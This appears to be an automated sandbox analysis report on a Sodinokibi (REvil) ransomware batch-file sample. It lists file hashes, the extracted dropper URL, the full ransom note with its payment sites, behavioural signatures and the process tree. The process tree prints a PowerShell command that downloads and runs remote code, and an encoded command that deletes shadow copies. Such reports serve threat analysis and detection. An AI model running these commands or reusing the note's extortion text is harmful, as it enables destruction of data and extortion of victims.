Analysis

  • max time kernel
    126s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    05-08-2020 09:10

General

  • Target

    f63307d927f76a7440257534e6f8ce90.bat

  • Size

    220B

  • MD5

    5cc2898f29e28db6519da57795c9e09b

  • SHA1

    415d75288386a5a534fecc039e479a8092f8cdfe

  • SHA256

    87cfbdd18095373e4e2674283270a2f829cb9d025556397ea5738eec62710ed2

  • SHA512

    6fc920fda753894ab4ae3c4856d867ee41ea1eb61fdad542fef8c0cd6358008386f6894138ee45775fa11d0581af76172e489faf0aef6fb6bfd30fade4a7a222

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/f63307d927f76a7440257534e6f8ce90

Extracted

Path

C:\848c2y63y-read-me.txt

Family

sodinokibi

Ransom Note
---=== Welcome Resolute Investments ===--- [+] Whats Happen? [+] Your network has been penetrated. Your files are encrypted with strong military algorithm, and currently unavailable. You can check it: all files on your system has extension 848c2y63y. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). Also, all your business info copyed to our servers. Personal data and business contacts extracted. If you do not take action to contact us, the data will be published for free access to everyone. As soon as we receive the payment, all data will be deleted from our servers. [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/ABE4F1C751DBE10D 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/ABE4F1C751DBE10D Contact with us in chat on website. You have 3 days. If you need more time to make a decision and collect money for payment - inform the support chat about this. [+] How will the decryption process proceed after payment? [+] After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 1998Tj0bVuLGs2nybI5ub9Kqwx7uE2/vf94dYzPncZTwKHcp6/xDe+9pCSFxCCz1 eHhHunS5hixCpcDj+PwFlPlsjnqvIfREDvZbq8wKUhkoqOuVC/WG2QSrYV3fMvtg GBlzjz9c61nhFyuj95in0KzsLqTEXa4TnSOAMAq7pcKfqNwT7zaOUxmSlSC3IFaB +kd+IqiMZeEX9ONSLPpEb7uMShsflGSVnxjBJNVbT3UgJXVb61NDkif2GdeeC3pT jaEcpKsLrRHDIDYQSfjdCT5laQbBv+Fi8L+8FHw+h6t1bj3ETVSe9LaVOiNubifo wfWqeqojl5Xi3oOMK2BcsvZ4AhOCpw5EXrTlcuenGUcN+ifPPpGGWmXdAgtV/4sk 30yWklWK2KUtDI4Q13wfMKT9aMEzT9jaV24bCZEp4linBV+OkYGlznxdKL1oX6kK 3OCa/ToImuOGzo0JzSGpceZ50KjEO6XP9lU6V181YpOluce0c6l7Bl6nXRPaTKry cL1W5B4KLUJNiLj/nvAf8FwrvExUp7jrQgPyaWhr2vonvj1rroJeQNaaaYPE4U/D WnnjhOqkXzag2AEB83VtYye4iqvSbQpQtOuI3wIlOqFV8gCgEjxLHI5ue2Cod62Q cMckREggrloTS5E6MsIYB8kVQXuqB58KEggceW76iyvhQv2tgBVU9sL9ZrV0QArf fF4vNHV9K4Th1ZbpP362G4+n8LxFDbdp7msMglebwJ9V503/AVHy1GyCDCRW2NFx EZdq78/Cj5fCvv8/bfv3DAVAhNt7LwtiONZzwjTduuiy5WcdLiiUqRVzFR6dmats X+yD0TkYU6iRU8qubRZjI/H9m94sDK44OrFucgEpbYAS5WTOWycKejFEUZekKJgu 5dNkBYOhnFxbY1Uvk7WZLJAR1ag3RWSj8DemYGLxssBMOgrerktyCupGtrxhyAFz sbP5S6wbTaoW7dK8tKGhNuIqgkpRpYUY2+28vW/0WaalEeyOKSU/JvBYv8fQAq9G AYDcc1PYW8sCxroHEeCd8kyAxLBeep8b19inznOO6Ok/+uylBYcB7Or2gyVf0L47 bqU0zfhko1zYBYBWwNRqUmgmMgKjRNzTdqc39v66ln5GspFwnT3g7OxXRkkmHxaO k9DUJtcVeHadMGKw2q7U+2kvVmGsK2FNv3jVA8C+Y2hScz1BjtwBPsHQunFRjdG2 deKL9zmzNkWiZ5PjwMui/gEsL1iQ5gEQjemWppRGNhRWbBr5+w0DB3HQZuzPiO3z fdBRQLaume+YsQLLZWel5MQ+ZZW+SwYt3gv4hC1IzmtUHwmj0AM= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

Signatures

  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Blacklisted process makes network request 51 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates connected drives 3 TTPs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\f63307d927f76a7440257534e6f8ce90.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1376
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/f63307d927f76a7440257534e6f8ce90');Invoke-JFFIICTTYZLYL;Start-Sleep -s 10000"
      2⤵
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in System32 directory
      PID:1428
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1064
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1840

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

  • memory/1064-3-0x0000000000000000-mapping.dmp

  • memory/1428-0-0x0000000000000000-mapping.dmp